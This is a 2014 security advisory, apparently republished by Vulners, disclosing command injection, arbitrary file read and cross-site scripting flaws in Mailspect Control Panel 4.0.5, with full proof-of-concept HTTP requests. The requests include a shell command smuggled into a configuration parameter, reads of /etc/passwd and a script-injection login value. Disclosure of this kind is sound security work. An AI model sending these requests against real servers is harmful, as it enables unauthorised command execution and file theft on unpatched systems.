Vulners
Lucene search
Mailspect Control Panel 4.0.5 - Multiple Vulnerabilities
Document Title:
============
Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities
Release Date:
===========
June 21, 2014
Product & Service Introduction:
========================
Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched
in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin.
Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quaratine Solution and Mail Filter. Subsequently,
the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in
content filers and reputation engines.
Abstract Advisory Information:
=======================
BGA Team discovered a remote code execution, two arbitrary file read and one cross site scripting vulnerability in Mailspect Control Panel
4.0.5 web application.
Vulnerability Disclosure Timeline:
=========================
May 4, 2014 : Contact with Vendor
May 16, 2014 : Vendor Response
June 21, 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Multilayered Email Security & Archive for Gateways, MTA's & Servers
Product: Mailspect Control Panel 4.0.5
Other versions may be affected.
Exploitation Technique:
==================
RCE: Remote, Authenticated
AFR: Remote, Authenticated
XSS: Remote, Unauthenticated
Severity Level:
===========
High
Technical Details & Description:
========================
1. Sending a POST request to "/system_module.cgi" with config_version_cmd parameter's value set to a linux command group like "whoami >
/tmp/who; /usr/local/MPP/mppd -v" causes the former command's execution by sending a GET request (or simply visiting) to
"status_info.cgi?group=default" page.
Other parameters with the suffix "_cmd" are probably vulnerable.
2. Sending a GET request to "/monitor_logs_ctl.cgi" with log_dir parameter's value set to "/" and log_file's value set to an arbitrary
file name like "/etc/passwd" will cause the file's content's disclosure.
3. Sending a POST request to "/monitor_manage_logs.cgi" with log_file parameter's value set to an arbitrary file name like "/etc/passwd"
will cause the file's content's disclosure.
4. Sending a POST request to "/monitor_manage_logs.cgi" with login parameter's value set to "></script>js to be executed<script/> leads
the Javascript code's execution.
Proof of Concept (PoC):
==================
Proof of Concept RCE Request:
POST /system_module.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/system_module.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1282
post=1&config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xml&config_language=&config_log_dir=%2Fvar%2Flog%2FMPP%2F&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v&config_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txt&config_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s&config_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-r&config_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.sh&config_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.pl&config_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.pl&config_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.sh&config_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmitted&config_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.sh&config_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmark&config_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshell&config_fprot_dir=&config_pid_file=%2Fvar%2Frun%2Fmppd.pid&config_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdate&config_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplog&config_mpp_parser_time_interval=20&page_refresh=60
2. Proof of Concept AFR Request 1:
GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50&filter=&dummy=0.4426060212816081 HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_realtime_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
3. Proof of Concept AFR Request 2:
POST /monitor_manage_logs.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_manage_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
group=default&post=1&log_file=/etc/passwd&download=Download&save_to_dir=&tar_gzip=on
4. Proof of Concept XSS Request:
GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Solution Fix & Patch:
================
XSS will be patched at version 4.0.7
There will be no patch for RCE and AFR vulnerabilities as stated at the vendor's reply.
Security Risk:
==========
The risk of the vulnerabilities above estimated as high.
Credits & Authors:
==============
Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBAÞ
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: www.bga.com.tr/advisories.html
Social: twitter.com/bgasecurity
Contact: [email protected]
Copyright © 2014 | BGA SecurityData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Jun 2014 00:00Current